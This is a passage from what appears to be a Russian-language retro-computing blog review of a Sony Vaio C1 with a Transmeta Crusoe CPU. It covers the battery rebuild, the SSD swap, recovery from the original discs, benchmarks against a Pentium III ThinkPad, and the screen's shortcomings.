В моем экземпляре в какой-то момент нарастили память: за счет проприетарного модуля на 64 мегабайта довели общий объем до максимально возможных по паспорту 192 мегабайт.



И поменяли жесткий диск на 12-гигабайтный IBM Travelstar. Первое же включение показало, что HDD надо менять. Он очень громкий, причем это не баг: накопители IBM этой эпохи в принципе так работают. На видео ниже микрофон установлен прямо под ноутбуком, что не совсем честно. Но шум НЖМД раздражает в любом случае:



Про ребилд аккумулятора
Приведение ноутбука в пригодное к эксплуатации состояние я начал с перебора батарейки. В ноутбуке я это делаю впервые: до этого либо удавалось найти новый аккумулятор, либо автономная работа не требовалась. Тут же добыть даже бэушный аккумулятор практически невозможно, не говоря о новом. В штатной батарее три элемента 18650:



Eмкость каждой банки 2100 мАч. Меняю их на новые с емкостью 3600 мАч. Дело это не простое: нужно вскрыть корпус аккумулятора без повреждений (у меня почти получилось), снять прикрепленные точечной сваркой старые банки и установить новые, не повредив плату контроллера. С заменой я страдал долго: на приобретенных элементах были выведены контакты под пайку, но с ними далеко не сразу удалось уместить все три элемента в корпус.

Результат: 2 часа 45 минут автономной работы в тяжелом для ноутбука этих лет режиме воспроизведения видео в формате Mpeg4. В обзоре ZDNet тех лет упоминается результат в 2 часа 15 минут, в щадящем офисном режиме. При желании, можно попробовать найти расширенную шестиячеечную батарейку, которая выступает за пределы корпуса вниз и служит как бы подставкой для ноутбука. С ней вполне вероятны достойные 5-7 часов, но и без этого результат хороший.

Про разборку и сборку
Следующий этап: разобрать ноутбук и заменить жесткий диск. Для замены я приобретаю современный mSATA SSD на 128 гигабайт и плату-конвертер mSATA-IDE в 2,5-дюймовом кейсе.



Ремонтопригодность ноутбука средняя, но все равно лучше, чем в более современном Sony Vaio TZ. Практически все внутренности ноутбука доступны после снятия клавиатуры и верхней части корпуса, но необходимость разбирать ноутбук до основания просто для замены HDD это не идеально.



Заодно снимаю материнскую плату, чтобы проинспектировать процессор. Выше видна набортная память, разъемы для клавиатуры, мыши и кнопок управления на корпусе.



На обратной стороне графический ускоритель и чипсет, внезапно, от Intel. Выше также расположены микросхемы памяти и проприетарный слот для ее расширения.



Снимаю тонкий радиатор с кулером, под ним вижу окаменевшие остатки термопрокладки. С трудом убираю их, стараясь не расколоть кристалл:



Меняю прокладку и собираю все обратно:



Получаю практически бесшумный ноутбук: звуки здесь издает только кулер, и только под нагрузкой, в офисном режиме его почти никогда не слышно. Смена HDD на SSD на удивление не принесла заметного ускорения работы Windows: как работало более-менее нормально, так и работает.

Про рекавери
Предыдущим владельцем была установлена нештатная для этой модели Windows ME с базовым набором драйверов. Такой вариант без проблем бы работал на ноутбуке любого другого производителя, но это же Sony! Мало того, что здесь присутствует уникальное железо (веб-камера, модуль Bluetooth). Ноутбук также оснащен фирменным колесом Jog Dial, которое без софта от Sony просто не работает.



Ладно, можно обойтись без колеса, но даже такие базовые вещи, как регулировка яркости дисплея и громкости, не работают без фирменных утилит. Еще до покупки ноутбука я был знаком со страданиями уважаемого Invair (его обзор ноутбука похожей модели вы можете прочитать здесь): он пошел по пути чистой установки Windows ME и установки поверх нужных драйверов и софта. Нет ничего невозможного, но одним из моих требований было избежать подобную ретроболь. Поэтому я заранее уточнил у продавца, есть ли в комплекте диски восстановления. И они таки были в комплекте:



Это важный момент, так как в сети этих дисков я не нашел (скоро они там появятся, но уже благодаря мне). Драйверы тоже нельзя просто скачать с сайта производителя все давно удалено. Проще всего и правильнее всего восстановиться с аутентичной резервной копии. Но у меня в комплекте не было оптического привода. Пришлось докупать:



Два диска из трех содержат в себе образ Windows 2000 со всеми драйверами и софтом. На третьем отдельно драйверы и программы для установки поверх чистой ОС.



За полчаса ноутбук был возвращен к состоянию как из магазина. Для установки русской локали потребовались файлы из дистрибутива Windows 2000. Я сначала хотел было искать образ в сети, но потом обнаружил, что дистрибутив лежит на жестком диске он входит в состав Recovery. Удобно!

Про впечатления
В те годы я бы все же постарался установить чистую систему, с минимумом софта от вендора, который жрет ресурсы. Теперь же, наоборот, я радуюсь фирменным обоям:



Фирменному медиаплееру, поддерживающему синхронизацию с минидисковыми рекордерами, одной из ранних версий:



Окошку Jog Dial в правом нижнем углу:



Колесо Jog Dial тогда настолько нравилось владельцам Vaio C1, что его функциональность даже пытались воспроизвести в Linux. Мне он не показался таким уж полезным: запускать программы привычнее через меню пуск или панель задач. Но в некоторых случаях без него обойтись нельзя (та же регулировка яркости экрана), а иногда он полезен. Например в Microsoft Word можно повесить на колесо прокрутку документа и быстро переключаться между страницами.



Зато мышиный джойстик оказался очень кстати. Реализация запатентованного IBM трекпоинта здесь не хуже, чем в оригинале, а для такого компактного устройства этот вариант куда лучше любых микротачпадов, которые пытались внедрить позднее в Sony Vaio P. Радует стабильность Windows 2000: ноутбук ни падает в синий экран, нормально уходит в режим сна и возвращается из него. Звучит как что-то обычное, но в Win 9x/ME такое поведение вовсе не гарантируется.

Про фотокамеру



В Vaio C1 использована очень интересная камера. Матрица выполнена по технологии CCD. Поддерживается фотосъемка и запись видео с разрешением 320x240 и частотой 30 кадров в секунду. Фокусировка при этом ручная с помощью крутилки на корпусе камеры. Кажется, что это прямо рабочий вариант для конф-коллов, но нет. Windows 2000 хоть и является прямым предком современной Windows 10, в интернет выходит так же плохо, как и Windows 98. Даже если поставить Windows XP, для современного сервиса не хватит производительности. Да и 20 лет назад камеру C1 использовали именно как фотоаппарат: на фоне первых мобильников с такой же функциональностью разрешение QVGA было вполне себе адекватным.



Sony постаралась сделать эту фичу удобной: камера вращается вокруг своей оси, есть качественный софт с кучей настроек, и даже кнопка быстрого вызова камеры и фотосъемки двухпозиционная, как в настоящих фотоаппаратах. Впрочем, через 20 лет результат все равно кажется выглядит посредственно.

Про Transmeta Crusoe
Компания Transmeta была основана в 1995 году. В 2000 году они представили свой первый продукт серию процессоров Crusoe. Эти процессоры построены на архитектуре VLIW и с обычными x86 имеют мало общего. За трансляцию команд (хочется сказать эмуляцию x86, хотя это не совсем правильно) отвечала технология Code Morphing. Самая интересная особенность Code Morphing в том, что это было программное решение.

Транслятор при загрузке компьютера помещается в оперативную память и съедает 16 мегабайт полезного объема. Такая конструкция позволяла даже доставлять обновления ПО, например, добавлять поддержку каких-то инструкций или чинить баги. Как преимущество подобного подхода была заявлена оптимизация кода, ускорение выполнения часто используемых инструкций. Еще одна фича процессора технология LongRun. В некотором смысле это аналог Intel Speedstep: способ уменьшить энергопотребление процессора, когда это не требуется. Это кажется единственная фича Crusoe, которая видна со стороны:



Transmeta утверждала, что технология получилась очень гибкая, позволяющая поднимать напряжение и частоту процессора незаметно для пользователя, когда это необходимо и без лагов. Поверим на слово, хотя некие тормоза после простоя я все же наблюдал. В бенчмарках нет разницы между режимами энергопотребления, адаптивным и максимальным, результаты одинаковые. Все вместе эти технологии обещали достойную производительность при очень низком энергопотреблении, что отчасти подтверждается моими испытаниями автономной работы. Выбор Sony и других производителей в пользу Crusoe давал им возможность создавать очень компактные устройства. Но не обязательно самые мощные. Давайте проверим, сравнив производительность Sony C1 с нотбуком ThinkPad 600X.

Ноутбук ThinkPad 600X выпущен в 1999 году и построен на базе процессора Pentium III с частотой 500 Мгц. Вполне адекватный конкурент процессору Crusoe с частотой 667 Мгц и неизбежным оверхедом в виде транслятора инструкций. Конечно в 2001 году уже выпускались ноутбуки с частотой процессора 750 и даже 900 Мгц, но они не были компактными. Начнем с универсального теста SuperPi, который я запускал даже на 386-м ПК:



4 минуты 32 секунды. На Pentium III 500 у меня получается 4:58, Transmeta оказывается впереди! Ноутбук на Pentium III 900 показал результат в 3 минуты 3 секунды. Неужели Transmeta настолько хороша?



Не совсем. Реалистичный бенчмарк в архиваторе WinRAR 3.80 показал среднюю скорость сжатия данных в 95 килобайт в секунду. Pentium III 500 206 килобайт в секунду, более чем в два раза быстрее. Наконец, актуальный в те времена бенчмарк процессора CPUmark 99 на Crusoe дает результат в 42,1 балла:



Третий пентиум 46,4 балла, немного выше. Кажется сложная схема с трансляцией команд для процессора с чужой архитектурой иногда работает хорошо, иногда не очень, но в целом производительность в пересчете на мегагерц у Transmeta Crusoe ниже, чем у нормальных процессоров. Драматического отставания тоже нет. Даже если в каких-то задачах Crusoe соответствует какому-нибудь Pentium II на 300 мегагерц, это неплохо: выходит вполне достаточная (для своей эпохи) мощность в компактном корпусе.

Хотел написать, что компании Transmeta не повезло: они выпустили продукт под самый конец бума доткомов. В конце 2001 года вся индустрия испытывала депрессию и головокружение от предыдущих успехов. Конкуренты быстро обошли процессоры Crusoe (и выпущенные в 2004 году Efficeon с частотой до 1,7 Ггц) если не по энергоэффективности, то по производительности точно. У Transmeta было много возможностей закрепиться на рынке когда, например, была проблема с непригодными для компактных ноутбуков горячими Pentium 4, или когда возник спрос на дешевые нетбуки в конце десятилетия. Они могли занять нишу процессоров для встраиваемых устройств (и даже пытались), а позднее возможно даже побороться с ARM на рынке смартфонов.

Но ничего этого не случилось: ассортимент ультрапортатива на Crusoe в начале нулевых стал единственной умеренной победой над Intel, дальше были только редкие поставки нишевых тонких клиентов. По моему субъективному впечатлению, Transmeta была такой рок-н-рольной бандой, которая ворвалась на фестиваль классической музыки. Было весело, громко, но слегка неуместно. Необычный подход, уникальная архитектура, звездная команда больших профессионалов. Но при этом не совсем понятная стратегия развития бизнеса и уж точно отсутствие возможностей конкурировать с гигантами, Intel и AMD, у которых отточена не только R&D, но и производство, контроль качества, цепочка поставок и маркетинг.

По идее, в своей второй жизни Crusoe мог стать прекрасной площадкой для экспериментов. В свое время Transmeta показывала, что трансляция x86 только один из вариантов. Демонстрировался, например, нативный интерпретатор ПО, написанного на Java. Это какое поле для экспериментов, если полпроцессора реализовано в софте! К сожалению, и это тоже не вышло. Исходные коды закрыты, возможность, например, нативного запуска Linux даже не рассматривалась. Команда любителей, способная расковырять Code Morphing и написать что-то свое, не сложилась устройства так и не стали массовыми. Единственное, что сделали это собрали информацию по успешному запуску Linux на тех же Sony Vaio. Немного жаль, что так вышло: без экспериментов с точки зрения пользователя ноутбук на Crusoe ничем не отличается от соседа на базе скучного Pentium 3.

Про DOS, экран и клавиатуру
Насколько этот ноутбук хорош сейчас, в 2021 году? Безусловно это, в моих терминах, дичь, максимальный ноутбучный упорин, очень нестандартный продукт двадцатилетней давности. Является ли он идеальным ретроноутбуком? Не думаю. В нем все же много компромиссов ради компактности, и основные мои претензии относятся к экрану. Малые углы обзора TN-матрицы не являются большой проблемой, а вот легкое, почти незаметное дрожание картинки является. Кажется это связано с тем, что изображение выводится в режиме чересстрочной развертки. На любом уровне подсветки, кроме максимального, инвертор начинает гудеть. Наконец, в Vaio С1 вообще никак не реализовано масштабирование картинки. С одной стороны это понятно: нельзя взять изображение с соотношением сторон 4:3 и растянуть его практически до 20:9. А даже если бы было можно, получалось бы что-то такое:



Те игры, которые на нем пойдут (а благодаря дискретной графике, пойдет много что), я бы предпочел смотреть с толстыми черными полосами по бокам. Нормально, но не идеально. Есть проблемы и с играми под DOS. С одной стороны, DOS на Vaio C1 вполне возможен, хотя и не поддерживается официально. Даже звуковой чип Yamaha способен эмулировать Sound Blaster. Но опять проблема с экраном:



В DOS-игре картинка с разрешением в 400 точек по высоте не только имеет черные полосы со всех сторон. У нее еще и пропорции неправильные, так как на классическом ЭЛТ-мониторе или на ЖК-дисплее с масштабированием она должна растягиваться до стандартного соотношения 4:3. Опять обидно: вроде бы есть универсальный и очень компактный ноутбук с поддержкой DOS и правильным звуком, но нормально работать он будет только при подключении к внешнему монитору.



Почему вообще в этом ноутбуке использовали широкий экран, хотя так было делать не принято в те времена? Чтобы уместить нормальную клавиатуру. Примером ненормальной клавиатуры является родственная модель Sony PCG-U1, также на базе Crusoe:



Там использован экран с диагональю 6,4 дюйма. Получился совсем миниатюрный ноутбук, но кнопки на нем удобнее всего нажимать большими пальцами, как на телефоне. Никакого слепого набора. У Vaio C1 очень комфортные клавиши, большого размера, с хорошей глубиной хода. На нем приятно набирать текст, это отличный офисный сабноутбук. Впрочем, и тут придется привыкать.



На фото Линус Торвальдс, который работал в Transmeta до 2003 года. Он держит в руках ноутбук Sony C1 но более ранней версии, на базе процессора Pentium II. И можно заметить, что блок клавиш курсора раньше был сдвинут вниз. Позднее от такой раскладки отказались, поставив на место клавиш курсора динамик. Получилось вот что:



Это не очень удобно: нажимая Shift справа очень легко ошибиться и вместо набора букв перескочить на строку выше. К тому же расположение клавиш зависит от региона, где-то Shift находится левее кнопки вверх, что наверное более правильно. Я бы предпочел убрать вообще ненужную кнопку FN и вместо нее сделать покрупнее Shift, но Писать фидбек больше некому.

Вот такое получилось интересное ретро, очень нестандартный ноутбук даже по меркам Sony. Теперь это мой основной кандидат, если вдруг захочется взять старую технику в отпуск. Он полностью к этому готов: батарейка новая, накопитель большой, работает бесшумно. Можно смотреть фильмы, слушать музыку в Winamp, набирать тексты в Word 2000, играть в штатный Pinball и возможно даже в Quake. В общем, развлекаться так, будто последних 20 лет и вовсе не было.